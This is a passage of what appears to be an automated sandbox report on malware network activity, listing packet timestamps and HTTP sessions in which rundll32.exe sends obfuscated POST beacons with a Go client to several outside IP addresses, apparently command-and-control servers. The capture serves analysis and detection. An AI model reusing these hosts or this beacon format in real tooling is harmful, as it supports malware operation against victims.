Jul 15, 2024 12:53:38.746136904 CEST	49784	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:38.751420975 CEST	80	49783	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:38.751667976 CEST	80	49784	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:38.751755953 CEST	49784	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:38.752332926 CEST	49784	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:38.757249117 CEST	80	49784	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:40.373198986 CEST	80	49784	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:40.373343945 CEST	49784	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:40.375466108 CEST	49784	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:40.376379967 CEST	49785	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:40.380281925 CEST	80	49784	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:40.381258011 CEST	80	49785	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:40.381342888 CEST	49785	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:40.381884098 CEST	49785	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:40.386797905 CEST	80	49785	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:41.195003033 CEST	80	49785	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:41.195245028 CEST	49785	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:41.200865984 CEST	80	49785	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:41.200973034 CEST	49785	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:51.447284937 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:51.454394102 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:55.603470087 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:55.608520985 CEST	80	49768	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:55.822423935 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:55.827843904 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:56.041301012 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:56.089605093 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:56.655725956 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:56.656270981 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:56.661226988 CEST	20529	49770	185.231.155.234	192.168.2.5

HTTP Request Dependency Graph

195.2.70.38

91.142.74.28

77.238.224.56

77.238.229.63

77.238.250.123

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	195.2.70.38	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:54.649132967 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 7MBMBL3a Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	195.2.70.38	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:55.833787918 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: eSQmUE8j Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	91.142.74.28	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:56.412877083 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 1mEhlOkp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	91.142.74.28	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:57.545780897 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: MyXTF7ll Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49711	77.238.224.56	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:58.163238049 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: CGtGxHJD Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49712	77.238.224.56	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:59.386687040 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NcwlBYDJ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49713	77.238.229.63	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:50:59.785394907 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Kg6JyYbW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49714	77.238.229.63	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:01.167155981 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: z2Xzv1Cn Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49715	77.238.250.123	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:01.896954060 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Kfz6N6A8 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:02.290771008 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:02 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49716	77.238.250.123	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:02.844525099 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nj2YfkTv Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:03.391365051 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:03 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49717	195.2.70.38	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:03.965400934 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: uhN0gLUg Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49718	91.142.74.28	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:05.709209919 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: o7SaWr3Y Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49722	77.238.224.56	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:07.453811884 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: UhHxW3e1 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	77.238.229.63	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:09.083657026 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: S2xgNF8m Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49727	77.238.250.123	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:10.705878973 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: sVuhwGs3 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:11.313143015 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:11 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49728	195.2.70.38	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:32.497910023 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: sIfHrafn Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49729	195.2.70.38	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:33.587869883 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Nf3wk7U4 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49730	91.142.74.28	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:34.255948067 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ATDhLw6w Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49731	91.142.74.28	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:35.293457985 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Zkenh3CY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: 